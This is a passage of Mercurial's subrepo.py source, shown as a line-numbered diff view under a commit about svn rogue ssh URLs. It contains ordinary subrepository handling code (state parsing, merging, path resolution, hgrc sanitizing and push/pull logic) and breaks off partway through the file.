subrepo: add tests for svn rogue ssh urls (SEC)...
Sean Farley
r33713:173ecccb stable
@@ -1,1987 +1,1991 @@
# subrepo.py - sub-repository handling for Mercurial
#
# Copyright 2009-2010 Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

from __future__ import absolute_import

import copy
import errno
import hashlib
import os
import posixpath
import re
import stat
import subprocess
import sys
import tarfile
import xml.dom.minidom


from .i18n import _
from . import (
    cmdutil,
    config,
    encoding,
    error,
    exchange,
    filemerge,
    match as matchmod,
    node,
    pathutil,
    phases,
    pycompat,
    scmutil,
    util,
    vfs as vfsmod,
)

hg = None
propertycache = util.propertycache

nullstate = ('', '', 'empty')

def _expandedabspath(path):
    '''
    get a path or url and if it is a path expand it and return an absolute path
    '''
    expandedpath = util.urllocalpath(util.expandpath(path))
    u = util.url(expandedpath)
    if not u.scheme:
        path = util.normpath(os.path.abspath(u.path))
    return path
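
# Illustrative example (not part of the original change): a local path such as
# '~/repos/sub' is tilde-expanded and returned as a normalized absolute
# filesystem path, while an argument carrying a scheme, e.g.
# 'ssh://host/repo', is returned exactly as passed in.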

def _getstorehashcachename(remotepath):
    '''get a unique filename for the store hash cache of a remote repository'''
    return hashlib.sha1(_expandedabspath(remotepath)).hexdigest()[0:12]
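
# Illustrative: the cache file name is the first 12 hex digits of the SHA-1 of
# the expanded remote path, so each remote repository maps to its own stable,
# filesystem-safe entry under the cache/storehash/ directory used below.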

class SubrepoAbort(error.Abort):
    """Exception class used to avoid handling a subrepo error more than once"""
    def __init__(self, *args, **kw):
        self.subrepo = kw.pop('subrepo', None)
        self.cause = kw.pop('cause', None)
        error.Abort.__init__(self, *args, **kw)

def annotatesubrepoerror(func):
    def decoratedmethod(self, *args, **kargs):
        try:
            res = func(self, *args, **kargs)
        except SubrepoAbort as ex:
            # This exception has already been handled
            raise ex
        except error.Abort as ex:
            subrepo = subrelpath(self)
            errormsg = str(ex) + ' ' + _('(in subrepo %s)') % subrepo
            # avoid handling this exception by raising a SubrepoAbort exception
            raise SubrepoAbort(errormsg, hint=ex.hint, subrepo=subrepo,
                               cause=sys.exc_info())
        return res
    return decoratedmethod
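
# Usage note (illustrative): subrepo methods below are wrapped with
# @annotatesubrepoerror so a plain error.Abort raised deep inside a subrepo
# operation is reported once, annotated with '(in subrepo <path>)', instead of
# being re-annotated at every level of nesting.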

def state(ctx, ui):
    """return a state dict, mapping subrepo paths configured in .hgsub
    to tuple: (source from .hgsub, revision from .hgsubstate, kind
    (key in types dict))
    """
    p = config.config()
    repo = ctx.repo()
    def read(f, sections=None, remap=None):
        if f in ctx:
            try:
                data = ctx[f].data()
            except IOError as err:
                if err.errno != errno.ENOENT:
                    raise
                # handle missing subrepo spec files as removed
                ui.warn(_("warning: subrepo spec file \'%s\' not found\n") %
                        repo.pathto(f))
                return
            p.parse(f, data, sections, remap, read)
        else:
            raise error.Abort(_("subrepo spec file \'%s\' not found") %
                              repo.pathto(f))
    if '.hgsub' in ctx:
        read('.hgsub')

    for path, src in ui.configitems('subpaths'):
        p.set('subpaths', path, src, ui.configsource('subpaths', path))

    rev = {}
    if '.hgsubstate' in ctx:
        try:
            for i, l in enumerate(ctx['.hgsubstate'].data().splitlines()):
                l = l.lstrip()
                if not l:
                    continue
                try:
                    revision, path = l.split(" ", 1)
                except ValueError:
                    raise error.Abort(_("invalid subrepository revision "
                                        "specifier in \'%s\' line %d")
                                      % (repo.pathto('.hgsubstate'), (i + 1)))
                rev[path] = revision
        except IOError as err:
            if err.errno != errno.ENOENT:
                raise

    def remap(src):
        for pattern, repl in p.items('subpaths'):
            # Turn r'C:\foo\bar' into r'C:\\foo\\bar' since re.sub
            # does a string decode.
            repl = util.escapestr(repl)
            # However, we still want to allow back references to go
            # through unharmed, so we turn r'\\1' into r'\1'. Again,
            # extra escapes are needed because re.sub string decodes.
            repl = re.sub(r'\\\\([0-9]+)', r'\\\1', repl)
            try:
                src = re.sub(pattern, repl, src, 1)
            except re.error as e:
                raise error.Abort(_("bad subrepository pattern in %s: %s")
                                  % (p.source('subpaths', pattern), e))
        return src

    state = {}
    for path, src in p[''].items():
        kind = 'hg'
        if src.startswith('['):
            if ']' not in src:
                raise error.Abort(_('missing ] in subrepo source'))
            kind, src = src.split(']', 1)
            kind = kind[1:]
            src = src.lstrip() # strip any extra whitespace after ']'

        if not util.url(src).isabs():
            parent = _abssource(repo, abort=False)
            if parent:
                parent = util.url(parent)
                parent.path = posixpath.join(parent.path or '', src)
                parent.path = posixpath.normpath(parent.path)
                joined = str(parent)
                # Remap the full joined path and use it if it changes,
                # else remap the original source.
                remapped = remap(joined)
                if remapped == joined:
                    src = remap(src)
                else:
                    src = remapped

        src = remap(src)
        state[util.pconvert(path)] = (src.strip(), rev.get(path, ''), kind)

    return state
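
# Illustrative .hgsub / .hgsubstate contents (example values, not from this
# repository):
#   .hgsub:       nested-hg  = https://example.com/nested-hg
#                 nested-svn = [svn]https://example.com/svn/trunk
#   .hgsubstate:  <40-hex node or svn/git revision> nested-hg
# state() combines both files into {path: (source, revision, kind)}.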

def writestate(repo, state):
    """rewrite .hgsubstate in (outer) repo with these subrepo states"""
    lines = ['%s %s\n' % (state[s][1], s) for s in sorted(state)
             if state[s][1] != nullstate[1]]
    repo.wwrite('.hgsubstate', ''.join(lines), '')
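
# Illustrative: each emitted .hgsubstate line is '<revision> <path>\n', sorted
# by path; entries whose revision equals the null state are skipped entirely.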
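# Case summary for submerge (illustrative): for each subrepo it compares the
# local (wctx), remote (mctx) and ancestor (actx) states; unchanged sides are
# taken silently, one-sided changes are fetched or removed, and genuine
# divergence falls through to an interactive merge/local/remote prompt.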
def submerge(repo, wctx, mctx, actx, overwrite, labels=None):
    """delegated from merge.applyupdates: merging of .hgsubstate file
    in working context, merging context and ancestor context"""
    if mctx == actx: # backwards?
        actx = wctx.p1()
    s1 = wctx.substate
    s2 = mctx.substate
    sa = actx.substate
    sm = {}

    repo.ui.debug("subrepo merge %s %s %s\n" % (wctx, mctx, actx))

    def debug(s, msg, r=""):
        if r:
            r = "%s:%s:%s" % r
        repo.ui.debug("  subrepo %s: %s %s\n" % (s, msg, r))

    promptssrc = filemerge.partextras(labels)
    for s, l in sorted(s1.iteritems()):
        prompts = None
        a = sa.get(s, nullstate)
        ld = l # local state with possible dirty flag for compares
        if wctx.sub(s).dirty():
            ld = (l[0], l[1] + "+")
        if wctx == actx: # overwrite
            a = ld

        prompts = promptssrc.copy()
        prompts['s'] = s
        if s in s2:
            r = s2[s]
            if ld == r or r == a: # no change or local is newer
                sm[s] = l
                continue
            elif ld == a: # other side changed
                debug(s, "other changed, get", r)
                wctx.sub(s).get(r, overwrite)
                sm[s] = r
            elif ld[0] != r[0]: # sources differ
                prompts['lo'] = l[0]
                prompts['ro'] = r[0]
                if repo.ui.promptchoice(
                    _(' subrepository sources for %(s)s differ\n'
                      'use (l)ocal%(l)s source (%(lo)s)'
                      ' or (r)emote%(o)s source (%(ro)s)?'
                      '$$ &Local $$ &Remote') % prompts, 0):
                    debug(s, "prompt changed, get", r)
                    wctx.sub(s).get(r, overwrite)
                    sm[s] = r
            elif ld[1] == a[1]: # local side is unchanged
                debug(s, "other side changed, get", r)
                wctx.sub(s).get(r, overwrite)
                sm[s] = r
            else:
                debug(s, "both sides changed")
                srepo = wctx.sub(s)
                prompts['sl'] = srepo.shortid(l[1])
                prompts['sr'] = srepo.shortid(r[1])
                option = repo.ui.promptchoice(
                    _(' subrepository %(s)s diverged (local revision: %(sl)s, '
                      'remote revision: %(sr)s)\n'
                      '(M)erge, keep (l)ocal%(l)s or keep (r)emote%(o)s?'
                      '$$ &Merge $$ &Local $$ &Remote')
                    % prompts, 0)
                if option == 0:
                    wctx.sub(s).merge(r)
                    sm[s] = l
                    debug(s, "merge with", r)
                elif option == 1:
                    sm[s] = l
                    debug(s, "keep local subrepo revision", l)
                else:
                    wctx.sub(s).get(r, overwrite)
                    sm[s] = r
                    debug(s, "get remote subrepo revision", r)
        elif ld == a: # remote removed, local unchanged
            debug(s, "remote removed, remove")
            wctx.sub(s).remove()
        elif a == nullstate: # not present in remote or ancestor
            debug(s, "local added, keep")
            sm[s] = l
            continue
        else:
            if repo.ui.promptchoice(
                _(' local%(l)s changed subrepository %(s)s'
                  ' which remote%(o)s removed\n'
                  'use (c)hanged version or (d)elete?'
                  '$$ &Changed $$ &Delete') % prompts, 0):
                debug(s, "prompt remove")
                wctx.sub(s).remove()

    for s, r in sorted(s2.items()):
        prompts = None
        if s in s1:
            continue
        elif s not in sa:
            debug(s, "remote added, get", r)
            mctx.sub(s).get(r)
            sm[s] = r
        elif r != sa[s]:
            prompts = promptssrc.copy()
            prompts['s'] = s
            if repo.ui.promptchoice(
                _(' remote%(o)s changed subrepository %(s)s'
                  ' which local%(l)s removed\n'
                  'use (c)hanged version or (d)elete?'
                  '$$ &Changed $$ &Delete') % prompts, 0) == 0:
                debug(s, "prompt recreate", r)
                mctx.sub(s).get(r)
                sm[s] = r

    # record merged .hgsubstate
    writestate(repo, sm)
    return sm

def _updateprompt(ui, sub, dirty, local, remote):
    if dirty:
        msg = (_(' subrepository sources for %s differ\n'
                 'use (l)ocal source (%s) or (r)emote source (%s)?'
                 '$$ &Local $$ &Remote')
               % (subrelpath(sub), local, remote))
    else:
        msg = (_(' subrepository sources for %s differ (in checked out '
                 'version)\n'
                 'use (l)ocal source (%s) or (r)emote source (%s)?'
                 '$$ &Local $$ &Remote')
               % (subrelpath(sub), local, remote))
    return ui.promptchoice(msg, 0)

def reporelpath(repo):
    """return path to this (sub)repo as seen from outermost repo"""
    parent = repo
    while util.safehasattr(parent, '_subparent'):
        parent = parent._subparent
    return repo.root[len(pathutil.normasprefix(parent.root)):]

def subrelpath(sub):
    """return path to this subrepo as seen from outermost repo"""
    return sub._relpath

def _abssource(repo, push=False, abort=True):
    """return pull/push path of repo - either based on parent repo .hgsub info
    or on the top repo config. Abort or return None if no source found."""
    if util.safehasattr(repo, '_subparent'):
        source = util.url(repo._subsource)
        if source.isabs():
            return str(source)
        source.path = posixpath.normpath(source.path)
        parent = _abssource(repo._subparent, push, abort=False)
        if parent:
            parent = util.url(util.pconvert(parent))
            parent.path = posixpath.join(parent.path or '', source.path)
            parent.path = posixpath.normpath(parent.path)
            return str(parent)
    else: # recursion reached top repo
        if util.safehasattr(repo, '_subtoppath'):
            return repo._subtoppath
        if push and repo.ui.config('paths', 'default-push'):
            return repo.ui.config('paths', 'default-push')
        if repo.ui.config('paths', 'default'):
            return repo.ui.config('paths', 'default')
        if repo.shared():
            # chop off the .hg component to get the default path form
            return os.path.dirname(repo.sharedpath)
    if abort:
        raise error.Abort(_("default path for subrepository not found"))
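
# Resolution order (illustrative): for a nested repo, _abssource() joins the
# relative .hgsub source onto the parent's own resolved source, recursively;
# at the top it falls back to _subtoppath, then paths.default-push (for push),
# then paths.default, then the share source, and finally aborts or returns
# None depending on the 'abort' flag.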

def _sanitize(ui, vfs, ignore):
    for dirname, dirs, names in vfs.walk():
        for i, d in enumerate(dirs):
            if d.lower() == ignore:
                del dirs[i]
                break
        if vfs.basename(dirname).lower() != '.hg':
            continue
        for f in names:
            if f.lower() == 'hgrc':
                ui.warn(_("warning: removing potentially hostile 'hgrc' "
                          "in '%s'\n") % vfs.join(dirname))
                vfs.unlink(vfs.reljoin(dirname, f))
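
# Security note (illustrative): _sanitize() is run over non-hg subrepo
# checkouts so that a '.hg/hgrc' smuggled into, e.g., an svn or git subrepo
# cannot inject configuration into the enclosing Mercurial repository.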

def subrepo(ctx, path, allowwdir=False, allowcreate=True):
    """return instance of the right subrepo class for subrepo in path"""
    # subrepo inherently violates our import layering rules
    # because it wants to make repo objects from deep inside the stack
    # so we manually delay the circular imports to not break
    # scripts that don't use our demand-loading
    global hg
    from . import hg as h
    hg = h

    pathutil.pathauditor(ctx.repo().root)(path)
    state = ctx.substate[path]
    if state[2] not in types:
        raise error.Abort(_('unknown subrepo type %s') % state[2])
    if allowwdir:
        state = (state[0], ctx.subrev(path), state[2])
    return types[state[2]](ctx, path, state[:2], allowcreate)
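
# Note (illustrative): 'types' is the kind-to-class table defined near the end
# of this module, mapping subrepo kinds such as 'hg', 'svn' and 'git' to their
# classes; the pathauditor call rejects hostile paths (e.g. ones escaping the
# repository root) before any subrepo object is constructed.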

def nullsubrepo(ctx, path, pctx):
    """return an empty subrepo in pctx for the extant subrepo in ctx"""
    # subrepo inherently violates our import layering rules
    # because it wants to make repo objects from deep inside the stack
    # so we manually delay the circular imports to not break
    # scripts that don't use our demand-loading
    global hg
    from . import hg as h
    hg = h

    pathutil.pathauditor(ctx.repo().root)(path)
    state = ctx.substate[path]
    if state[2] not in types:
        raise error.Abort(_('unknown subrepo type %s') % state[2])
    subrev = ''
    if state[2] == 'hg':
        subrev = "0" * 40
    return types[state[2]](pctx, path, (state[0], subrev), True)

def newcommitphase(ui, ctx):
    commitphase = phases.newcommitphase(ui)
    substate = getattr(ctx, "substate", None)
    if not substate:
        return commitphase
    check = ui.config('phases', 'checksubrepos', 'follow')
    if check not in ('ignore', 'follow', 'abort'):
        raise error.Abort(_('invalid phases.checksubrepos configuration: %s')
                          % (check))
    if check == 'ignore':
        return commitphase
    maxphase = phases.public
    maxsub = None
    for s in sorted(substate):
        sub = ctx.sub(s)
        subphase = sub.phase(substate[s][1])
        if maxphase < subphase:
            maxphase = subphase
            maxsub = s
    if commitphase < maxphase:
        if check == 'abort':
            raise error.Abort(_("can't commit in %s phase"
                                " conflicting %s from subrepository %s") %
                              (phases.phasenames[commitphase],
                               phases.phasenames[maxphase], maxsub))
        ui.warn(_("warning: changes are committed in"
                  " %s phase from subrepository %s\n") %
                (phases.phasenames[maxphase], maxsub))
        return maxphase
    return commitphase
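
# Illustrative configuration: with
#   [phases]
#   checksubrepos = abort
# a parent commit whose subrepo revision sits in a higher (less public) phase
# aborts; 'follow' (the default) instead raises the parent commit's phase to
# match, and 'ignore' skips the check entirely.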

# subrepo classes need to implement the following abstract class:

class abstractsubrepo(object):

    def __init__(self, ctx, path):
        """Initialize abstractsubrepo part

        ``ctx`` is the context referring to this subrepository in the
        parent repository.

        ``path`` is the path to this subrepository as seen from
        innermost repository.
        """
        self.ui = ctx.repo().ui
        self._ctx = ctx
        self._path = path

    def addwebdirpath(self, serverpath, webconf):
        """Add the hgwebdir entries for this subrepo, and any of its subrepos.

        ``serverpath`` is the path component of the URL for this repo.

        ``webconf`` is the dictionary of hgwebdir entries.
        """
        pass

    def storeclean(self, path):
        """
        returns true if the repository has not changed since it was last
        cloned from or pushed to a given repository.
        """
        return False

    def dirty(self, ignoreupdate=False):
        """returns true if the dirstate of the subrepo is dirty or does not
        match current stored state. If ignoreupdate is true, only check
        whether the subrepo has uncommitted changes in its dirstate.
        """
        raise NotImplementedError

    def dirtyreason(self, ignoreupdate=False):
        """return reason string if it is ``dirty()``

        Returned string should have enough information for the message
        of exception.

        Otherwise, this returns None.
        """
        if self.dirty(ignoreupdate=ignoreupdate):
            return _("uncommitted changes in subrepository '%s'"
                     ) % subrelpath(self)

    def bailifchanged(self, ignoreupdate=False, hint=None):
        """raise Abort if subrepository is ``dirty()``
        """
        dirtyreason = self.dirtyreason(ignoreupdate=ignoreupdate)
        if dirtyreason:
            raise error.Abort(dirtyreason, hint=hint)

    def basestate(self):
        """current working directory base state, disregarding .hgsubstate
        state and working directory modifications"""
        raise NotImplementedError

    def checknested(self, path):
        """check if path is a subrepository within this repository"""
        return False

    def commit(self, text, user, date):
        """commit the current changes to the subrepo with the given
        log message. Use given user and date if possible. Return the
        new state of the subrepo.
        """
        raise NotImplementedError

    def phase(self, state):
        """returns phase of specified state in the subrepository.
        """
        return phases.public

    def remove(self):
        """remove the subrepo

        (should verify the dirstate is not dirty first)
        """
        raise NotImplementedError

    def get(self, state, overwrite=False):
        """run whatever commands are needed to put the subrepo into
        this state
        """
        raise NotImplementedError

    def merge(self, state):
        """merge currently-saved state with the new state."""
        raise NotImplementedError

    def push(self, opts):
        """perform whatever action is analogous to 'hg push'

        This may be a no-op on some systems.
        """
        raise NotImplementedError

    def add(self, ui, match, prefix, explicitonly, **opts):
        return []

    def addremove(self, matcher, prefix, opts, dry_run, similarity):
        self.ui.warn("%s: %s" % (prefix, _("addremove is not supported")))
        return 1

    def cat(self, match, prefix, **opts):
        return 1

    def status(self, rev2, **opts):
        return scmutil.status([], [], [], [], [], [], [])

    def diff(self, ui, diffopts, node2, match, prefix, **opts):
        pass

    def outgoing(self, ui, dest, opts):
        return 1

    def incoming(self, ui, source, opts):
        return 1

    def files(self):
        """return filename iterator"""
        raise NotImplementedError

    def filedata(self, name, decode):
        """return file data, optionally passed through repo decoders"""
        raise NotImplementedError

    def fileflags(self, name):
        """return file flags"""
        return ''

    def getfileset(self, expr):
        """Resolve the fileset expression for this repo"""
        return set()

    def printfiles(self, ui, m, fm, fmt, subrepos):
        """handle the files command for this subrepo"""
        return 1

    def archive(self, archiver, prefix, match=None, decode=True):
        if match is not None:
            files = [f for f in self.files() if match(f)]
        else:
            files = self.files()
        total = len(files)
        relpath = subrelpath(self)
        self.ui.progress(_('archiving (%s)') % relpath, 0,
                         unit=_('files'), total=total)
        for i, name in enumerate(files):
            flags = self.fileflags(name)
            mode = 'x' in flags and 0o755 or 0o644
            symlink = 'l' in flags
            archiver.addfile(prefix + self._path + '/' + name,
                             mode, symlink, self.filedata(name, decode))
            self.ui.progress(_('archiving (%s)') % relpath, i + 1,
                             unit=_('files'), total=total)
        self.ui.progress(_('archiving (%s)') % relpath, None)
        return total

    def walk(self, match):
        '''
        walk recursively through the directory tree, finding all files
        matched by the match function
        '''
        pass

    def forget(self, match, prefix):
        return ([], [])

    def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
        """remove the matched files from the subrepository and the filesystem,
        possibly by force and/or after the file has been removed from the
        filesystem. Return 0 on success, 1 on any warning.
        """
        warnings.append(_("warning: removefiles not implemented (%s)")
                        % self._path)
        return 1

    def revert(self, substate, *pats, **opts):
        self.ui.warn(_('%s: reverting %s subrepos is unsupported\n') \
                     % (substate[0], substate[2]))
        return []

    def shortid(self, revid):
        return revid

    def verify(self):
        '''verify the integrity of the repository. Return 0 on success or
        warning, 1 on any error.
        '''
        return 0

    @propertycache
    def wvfs(self):
        """return vfs to access the working directory of this subrepository
        """
        return vfsmod.vfs(self._ctx.repo().wvfs.join(self._path))

    @propertycache
    def _relpath(self):
        """return path to this subrepository as seen from outermost repository
        """
        return self.wvfs.reljoin(reporelpath(self._ctx.repo()), self._path)

class hgsubrepo(abstractsubrepo):
    def __init__(self, ctx, path, state, allowcreate):
        super(hgsubrepo, self).__init__(ctx, path)
        self._state = state
        r = ctx.repo()
        root = r.wjoin(path)
        create = allowcreate and not r.wvfs.exists('%s/.hg' % path)
        self._repo = hg.repository(r.baseui, root, create=create)

        # Propagate the parent's --hidden option
        if r is r.unfiltered():
            self._repo = self._repo.unfiltered()

        self.ui = self._repo.ui
        for s, k in [('ui', 'commitsubrepos')]:
            v = r.ui.config(s, k)
            if v:
                self.ui.setconfig(s, k, v, 'subrepo')
        # internal config: ui._usedassubrepo
        self.ui.setconfig('ui', '_usedassubrepo', 'True', 'subrepo')
        self._initrepo(r, state[0], create)

    @annotatesubrepoerror
    def addwebdirpath(self, serverpath, webconf):
        cmdutil.addwebdirpath(self._repo, subrelpath(self), webconf)

    def storeclean(self, path):
        with self._repo.lock():
            return self._storeclean(path)

    def _storeclean(self, path):
        clean = True
        itercache = self._calcstorehash(path)
        for filehash in self._readstorehashcache(path):
            if filehash != next(itercache, None):
                clean = False
                break
        if clean:
            # if not empty:
            # the cached and current pull states have a different size
            clean = next(itercache, None) is None
        return clean

    def _calcstorehash(self, remotepath):
        '''calculate a unique "store hash"

        This method is used to detect when there are changes that may
        require a push to a given remote path.'''
        # sort the files that will be hashed in increasing (likely) file size
        filelist = ('bookmarks', 'store/phaseroots', 'store/00changelog.i')
        yield '# %s\n' % _expandedabspath(remotepath)
        vfs = self._repo.vfs
        for relname in filelist:
            filehash = hashlib.sha1(vfs.tryread(relname)).hexdigest()
            yield '%s = %s\n' % (relname, filehash)
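
    # Illustrative cache contents produced by _calcstorehash():
    #   # /absolute/path/to/remote
    #   bookmarks = <40-hex sha1>
    #   store/phaseroots = <40-hex sha1>
    #   store/00changelog.i = <40-hex sha1>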

    @propertycache
    def _cachestorehashvfs(self):
        return vfsmod.vfs(self._repo.vfs.join('cache/storehash'))

    def _readstorehashcache(self, remotepath):
        '''read the store hash cache for a given remote repository'''
        cachefile = _getstorehashcachename(remotepath)
        return self._cachestorehashvfs.tryreadlines(cachefile, 'r')

    def _cachestorehash(self, remotepath):
        '''cache the current store hash

        Each remote repo requires its own store hash cache, because a subrepo
        store may be "clean" versus a given remote repo, but not versus another
        '''
        cachefile = _getstorehashcachename(remotepath)
        with self._repo.lock():
            storehash = list(self._calcstorehash(remotepath))
            vfs = self._cachestorehashvfs
            vfs.writelines(cachefile, storehash, mode='w', notindexed=True)

    def _getctx(self):
        '''fetch the context for this subrepo revision, possibly a workingctx
        '''
        if self._ctx.rev() is None:
            return self._repo[None] # workingctx if parent is workingctx
        else:
            rev = self._state[1]
            return self._repo[rev]

    @annotatesubrepoerror
    def _initrepo(self, parentrepo, source, create):
        self._repo._subparent = parentrepo
        self._repo._subsource = source

        if create:
            lines = ['[paths]\n']

            def addpathconfig(key, value):
                if value:
                    lines.append('%s = %s\n' % (key, value))
                    self.ui.setconfig('paths', key, value, 'subrepo')

            defpath = _abssource(self._repo, abort=False)
            defpushpath = _abssource(self._repo, True, abort=False)
            addpathconfig('default', defpath)
            if defpath != defpushpath:
                addpathconfig('default-push', defpushpath)

            fp = self._repo.vfs("hgrc", "w", text=True)
            try:
                fp.write(''.join(lines))
            finally:
                fp.close()

    @annotatesubrepoerror
    def add(self, ui, match, prefix, explicitonly, **opts):
        return cmdutil.add(ui, self._repo, match,
                           self.wvfs.reljoin(prefix, self._path),
                           explicitonly, **opts)

    @annotatesubrepoerror
    def addremove(self, m, prefix, opts, dry_run, similarity):
        # In the same way as sub directories are processed, once in a subrepo,
        # always enter any of its subrepos. Don't corrupt the options that will
        # be used to process sibling subrepos however.
        opts = copy.copy(opts)
        opts['subrepos'] = True
        return scmutil.addremove(self._repo, m,
                                 self.wvfs.reljoin(prefix, self._path), opts,
                                 dry_run, similarity)

    @annotatesubrepoerror
    def cat(self, match, prefix, **opts):
        rev = self._state[1]
        ctx = self._repo[rev]
        return cmdutil.cat(self.ui, self._repo, ctx, match, prefix, **opts)

    @annotatesubrepoerror
    def status(self, rev2, **opts):
        try:
            rev1 = self._state[1]
            ctx1 = self._repo[rev1]
            ctx2 = self._repo[rev2]
            return self._repo.status(ctx1, ctx2, **opts)
        except error.RepoLookupError as inst:
            self.ui.warn(_('warning: error "%s" in subrepository "%s"\n')
                         % (inst, subrelpath(self)))
            return scmutil.status([], [], [], [], [], [], [])

    @annotatesubrepoerror
    def diff(self, ui, diffopts, node2, match, prefix, **opts):
        try:
            node1 = node.bin(self._state[1])
            # We currently expect node2 to come from substate and be
            # in hex format
            if node2 is not None:
                node2 = node.bin(node2)
            cmdutil.diffordiffstat(ui, self._repo, diffopts,
                                   node1, node2, match,
                                   prefix=posixpath.join(prefix, self._path),
                                   listsubrepos=True, **opts)
        except error.RepoLookupError as inst:
            self.ui.warn(_('warning: error "%s" in subrepository "%s"\n')
                         % (inst, subrelpath(self)))

    @annotatesubrepoerror
    def archive(self, archiver, prefix, match=None, decode=True):
        self._get(self._state + ('hg',))
        total = abstractsubrepo.archive(self, archiver, prefix, match)
        rev = self._state[1]
        ctx = self._repo[rev]
        for subpath in ctx.substate:
            s = subrepo(ctx, subpath, True)
            submatch = matchmod.subdirmatcher(subpath, match)
            total += s.archive(archiver, prefix + self._path + '/', submatch,
                               decode)
        return total

    @annotatesubrepoerror
    def dirty(self, ignoreupdate=False):
        r = self._state[1]
        if r == '' and not ignoreupdate: # no state recorded
            return True
        w = self._repo[None]
        if r != w.p1().hex() and not ignoreupdate:
            # different version checked out
            return True
        return w.dirty() # working directory changed

    def basestate(self):
        return self._repo['.'].hex()

    def checknested(self, path):
        return self._repo._checknested(self._repo.wjoin(path))

    @annotatesubrepoerror
    def commit(self, text, user, date):
        # don't bother committing in the subrepo if it's only been
        # updated
        if not self.dirty(True):
            return self._repo['.'].hex()
        self.ui.debug("committing subrepo %s\n" % subrelpath(self))
        n = self._repo.commit(text, user, date)
        if not n:
            return self._repo['.'].hex() # different version checked out
        return node.hex(n)

    @annotatesubrepoerror
    def phase(self, state):
        return self._repo[state].phase()

    @annotatesubrepoerror
    def remove(self):
        # we can't fully delete the repository as it may contain
        # local-only history
        self.ui.note(_('removing subrepo %s\n') % subrelpath(self))
        hg.clean(self._repo, node.nullid, False)

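    # _get(state) sketch (illustrative): returns True when the wanted revision
    # is already present locally; otherwise it clones (empty local repo) or
    # pulls from the resolved source, refreshing the store hash cache when the
    # store was clean, and returns False.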
    def _get(self, state):
        source, revision, kind = state
        if revision in self._repo.unfiltered():
            return True
        self._repo._subsource = source
        srcurl = _abssource(self._repo)
        other = hg.peer(self._repo, {}, srcurl)
        if len(self._repo) == 0:
            self.ui.status(_('cloning subrepo %s from %s\n')
                           % (subrelpath(self), srcurl))
            parentrepo = self._repo._subparent
            # use self._repo.vfs instead of self.wvfs to remove .hg only
            self._repo.vfs.rmtree()
            other, cloned = hg.clone(self._repo._subparent.baseui, {},
                                     other, self._repo.root,
                                     update=False)
            self._repo = cloned.local()
            self._initrepo(parentrepo, source, create=True)
            self._cachestorehash(srcurl)
        else:
            self.ui.status(_('pulling subrepo %s from %s\n')
                           % (subrelpath(self), srcurl))
            cleansub = self.storeclean(srcurl)
            exchange.pull(self._repo, other)
            if cleansub:
                # keep the repo clean after pull
                self._cachestorehash(srcurl)
        return False

    @annotatesubrepoerror
    def get(self, state, overwrite=False):
        inrepo = self._get(state)
        source, revision, kind = state
        repo = self._repo
        repo.ui.debug("getting subrepo %s\n" % self._path)
        if inrepo:
            urepo = repo.unfiltered()
            ctx = urepo[revision]
            if ctx.hidden():
                urepo.ui.warn(
                    _('revision %s in subrepo %s is hidden\n') \
                    % (revision[0:12], self._path))
                repo = urepo
        hg.updaterepo(repo, revision, overwrite)

901 @annotatesubrepoerror
901 @annotatesubrepoerror
902 def merge(self, state):
902 def merge(self, state):
903 self._get(state)
903 self._get(state)
904 cur = self._repo['.']
904 cur = self._repo['.']
905 dst = self._repo[state[1]]
905 dst = self._repo[state[1]]
906 anc = dst.ancestor(cur)
906 anc = dst.ancestor(cur)
907
907
908 def mergefunc():
908 def mergefunc():
909 if anc == cur and dst.branch() == cur.branch():
909 if anc == cur and dst.branch() == cur.branch():
910 self.ui.debug("updating subrepo %s\n" % subrelpath(self))
910 self.ui.debug("updating subrepo %s\n" % subrelpath(self))
911 hg.update(self._repo, state[1])
911 hg.update(self._repo, state[1])
912 elif anc == dst:
912 elif anc == dst:
913 self.ui.debug("skipping subrepo %s\n" % subrelpath(self))
913 self.ui.debug("skipping subrepo %s\n" % subrelpath(self))
914 else:
914 else:
915 self.ui.debug("merging subrepo %s\n" % subrelpath(self))
915 self.ui.debug("merging subrepo %s\n" % subrelpath(self))
916 hg.merge(self._repo, state[1], remind=False)
916 hg.merge(self._repo, state[1], remind=False)
917
917
918 wctx = self._repo[None]
918 wctx = self._repo[None]
919 if self.dirty():
919 if self.dirty():
920 if anc != dst:
920 if anc != dst:
921 if _updateprompt(self.ui, self, wctx.dirty(), cur, dst):
921 if _updateprompt(self.ui, self, wctx.dirty(), cur, dst):
922 mergefunc()
922 mergefunc()
923 else:
923 else:
924 mergefunc()
924 mergefunc()
925 else:
925 else:
926 mergefunc()
926 mergefunc()
927
927
928 @annotatesubrepoerror
928 @annotatesubrepoerror
929 def push(self, opts):
929 def push(self, opts):
930 force = opts.get('force')
930 force = opts.get('force')
931 newbranch = opts.get('new_branch')
931 newbranch = opts.get('new_branch')
932 ssh = opts.get('ssh')
932 ssh = opts.get('ssh')
933
933
934 # push subrepos depth-first for coherent ordering
934 # push subrepos depth-first for coherent ordering
935 c = self._repo['']
935 c = self._repo['']
936 subs = c.substate # only repos that are committed
936 subs = c.substate # only repos that are committed
937 for s in sorted(subs):
937 for s in sorted(subs):
938 if c.sub(s).push(opts) == 0:
938 if c.sub(s).push(opts) == 0:
939 return False
939 return False
940
940
941 dsturl = _abssource(self._repo, True)
941 dsturl = _abssource(self._repo, True)
942 if not force:
942 if not force:
943 if self.storeclean(dsturl):
943 if self.storeclean(dsturl):
944 self.ui.status(
944 self.ui.status(
945 _('no changes made to subrepo %s since last push to %s\n')
945 _('no changes made to subrepo %s since last push to %s\n')
946 % (subrelpath(self), dsturl))
946 % (subrelpath(self), dsturl))
947 return None
947 return None
948 self.ui.status(_('pushing subrepo %s to %s\n') %
948 self.ui.status(_('pushing subrepo %s to %s\n') %
949 (subrelpath(self), dsturl))
949 (subrelpath(self), dsturl))
950 other = hg.peer(self._repo, {'ssh': ssh}, dsturl)
950 other = hg.peer(self._repo, {'ssh': ssh}, dsturl)
951 res = exchange.push(self._repo, other, force, newbranch=newbranch)
951 res = exchange.push(self._repo, other, force, newbranch=newbranch)
952
952
953 # the repo is now clean
953 # the repo is now clean
954 self._cachestorehash(dsturl)
954 self._cachestorehash(dsturl)
955 return res.cgresult
955 return res.cgresult
956
956
957 @annotatesubrepoerror
957 @annotatesubrepoerror
958 def outgoing(self, ui, dest, opts):
958 def outgoing(self, ui, dest, opts):
959 if 'rev' in opts or 'branch' in opts:
959 if 'rev' in opts or 'branch' in opts:
960 opts = copy.copy(opts)
960 opts = copy.copy(opts)
961 opts.pop('rev', None)
961 opts.pop('rev', None)
962 opts.pop('branch', None)
